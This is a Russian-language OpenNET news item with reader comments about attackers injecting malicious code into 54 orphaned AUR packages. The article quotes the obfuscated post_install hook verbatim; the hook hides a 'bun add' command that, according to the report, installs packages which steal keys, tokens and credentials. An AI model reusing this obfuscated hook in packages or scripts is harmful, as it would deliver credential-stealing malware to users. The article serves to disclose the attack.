Профиль: Аноним (вход | регистрация) неRU opennet.me  
The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В AUR осуществлена подстановка вредоносного кода ещё в 54 пакета

14.06.2026 14:41 (MSK)

Несмотря на меры, предпринятые разработчиками Arch Linux, деятельность по подстановке вредоносного кода в репозитории AUR (Arch User Repository) не остановлена. Несколько часов назад вредносный код подставлен ещё в 54 пакета, оставшихся без сопровождающих (история отмены вредоносных правок). В отличие от позавчерашних атак, вместо пакетного менеджера npm для установки вредоносных зависимостей на этот раз задействована платформа bun. Для обхода реализованных фильтров в функцию post_install вставляется обфусцированная строка, в которой вызывается команда "bun add" для установки пакетов с вредоносным кодом, осуществляющим сканирование и отправку на внешний сервер ключей, токенов и учётных данных.


   post_install() {
       $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
   }


  1. Главная ссылка к новости (https://lists.archlinux.org/ar...)
  2. OpenNews: Атакующие скомпрометировали 1577 пакетов в репозитории AUR
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/65685-aur
Ключевые слова: aur, arch, malware, bun
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (14) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, ы (?), 14:52, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > AUR
    > @
    > looks inside
    > @
    > npm

    well...

     
  • 1.2, Аноним (2), 15:01, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    А зачем вообще аур сегодня? Актуально было 20 лет назад, потому что rpm собирать было ещё той канителью и тут простой сборочный скрипт. Но аур всегда был помойкой.
     
  • 1.3, Аноним (3), 15:03, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    может проблема не в aur, а в npm например?
     
     
  • 2.9, Аноним (9), 15:51, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Крутая логика. Дом вскрыли монтировкой, потому что там не было замка, камер и систем защиты. Вывод - виноваты монтировки.
     

  • 1.4, Аноним (4), 15:10, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    AUR ВСЁ !
     
     
  • 2.6, bitman (??), 15:25, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    не AUR, а orphaned
     
  • 2.7, Аноним (7), 15:43, 14/06/2026 Скрыто ботом-модератором     [к модератору]
  • +/
     

  • 1.5, Аноним (5), 15:15, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А что, flatpack не помог?
     
  • 1.8, Аноним (7), 15:51, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Почему заброшенные пакеты не удаляют, а передают любому желающему? Предупреждение, стандартные 30 дней не размышление, нет ответа - удаление.
     
     
  • 2.10, Аноним (2), 15:55, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    У тебя так сопровождающих не останется. А ответ это power tripping, результат никого не волнует.
     

  • 1.11, Аноним (11), 15:56, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Зачем они это делают? На данных пользователей арча можно как-то поживиться?
     
  • 1.12, АДмин (?), 15:59, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Мне вот интересно почему атаки именно на Arch ? Не Void и не NixOS а именно Arch ???  Может это личное ???
     
     
  • 2.13, Аноним (2), 16:06, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    На серверах популярен, свежий относительно стабильный софт и роллинг. Ну, есть такой миф, что сабж норм. Атака на жсников, и ты правильно можешь предположить, что жсники в него верят в силу низкой квалификации и ограниченного опыта. Впрочем, из альтернатив у тебя только Федора и это корпоративная шляпа с экспериментами, регулярно переустанавливать надо и без гарантий.
     
  • 2.14, Аноним (14), 16:06, 14/06/2026 Скрыто ботом-модератором     [к модератору]
  • +/
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2026 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру